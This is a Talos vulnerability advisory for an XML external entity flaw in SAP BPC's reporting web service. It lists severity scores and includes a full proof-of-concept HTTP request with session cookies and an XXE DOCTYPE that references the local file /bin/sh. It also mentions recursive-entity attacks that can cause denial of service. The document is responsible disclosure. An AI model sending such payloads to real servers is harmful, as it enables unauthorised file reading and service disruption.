Talos IntelligenceTALOS-2018-0551SAP BPC Web Application Information Disclosure Vulnerability
5.5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:P/I:N/A:P
8.1 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H
0.001 Low
EPSS
Percentile
41.4%
Summary
An exploitable XML external entity vulnerability exists in the reporting functionality of SAP BPC. A specially crafted XML request can cause an XML external entity to be referenced, resulting in information disclosure and potential denial of service. An attacker can issue authenticated HTTP requests to trigger this vulnerability.
Tested Versions
SAP BPC
Product URLs
<https://www.sap.com/uk/products/bpc.html>
CVSSv3 Score
6.4 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:L
CWE
CWE-611 - Improper Restriction of XML External Entity Reference
Details
It was identified that the web application was vulnerable to an XML External Entity injection attack. While making malformed requests to most parts of the application appeared to produce error messages that indicated that XML validation was occurring, one location was identified where this was not the case:
POST /sap/bpc/systemrpt/GROUP_REPORTING1/AA HTTP/1.1
Accept: application/xml
Accept-Language: en
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
SAP-ModuleName: PC Web Client
SAP-TemplateName:
Content-Type: application/xml; charset=UTF-8
Content-Length: 541
Cookie: sap-usercontext=sap-language=EN&sap-client=500; MYSAPSSO2=AjQxMDIBABgAQQBQAFAARQBOAFQARQBTAFQARQBSADMCAAYANQAwADADABAAQQBQAEMAIAAgACAAIAAgBAAYADIAMAAxADUAMAA1ADIANwAxADUANAA4BAAAQEAACAYAAgBYCQACAEX%2fAPwwgfkGCSqGSIb3DQEHAqCB6zCB6AIVqwWWarAkGBSsOAwIaBQAwCwYJKoZIhvcNAQcBMYHIMIHFAgEBMBkwDjEMMAoGA1UEAxMDQVBDAgcgFBIiFyE4MAkGBSsOAwIaBQCgXTAYBgkqhkiG9w0BCQMxCwYJKoZIhvcNAQcFFhZGCSqGSIb3DQEJBTEPFw0xNTA1MjcxNTQ4MTdaMCMGCSqGSIb3DQEJBDEWBBRF0JDFCj0%2fafX%2fXaDDdqeXWf57xDAJBgcqhkjOOAQDBDAwLgIVALiRIey0Km0F40INQNQ%2fZOJaa3WoAhUAlHO3IGcRMTItvoVUKQLn2ngZR9U%3d; SAP_SESSIONID_APC_500=nNh7rq2Zn-CuMr1ABb_FzlVd-NyWhI8A4QCAAAoLIYc%3d
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
<!DOCTYPE AuditActivityReportFilter [<!ELEMENT AuditActivityReportFilter ANY ><!ENTITY xxe SYSTEM "file:///bin/sh" >]>
<AuditActivityReportFilter xmlns="http://xml.sap.com/2010/02/bpc">
<TimeScope>
<StartTime/>
<EndTime/>
</TimeScope>
<Paging>
<PageSize>20</PageSize>
<PageIndex>2</PageIndex>
</Paging>
<UserID/>
<ActivityFor>AppSet</ActivityFor>
<FunctionTask>&xxe;</FunctionTask>
<Source/>
<Parameter/>
<Field/>
<PreValue/>
<NewValue/>
<ReportFrom>ACTIVE</ReportFrom>
</AuditActivityReportFilter>
In this instance, two different responses were seen, which appeared to vary depending on whether the XXE entity was defined as a valid (as in this case) or invalid local file. In the event that an invalid file was referenced, an error was instead returned.
The vulnerability could also be used to trigger a CPU or memory exhaustion attack through recursively defined XML entities.
Related
5.5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:P/I:N/A:P
8.1 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H
0.001 Low
EPSS
Percentile
41.4%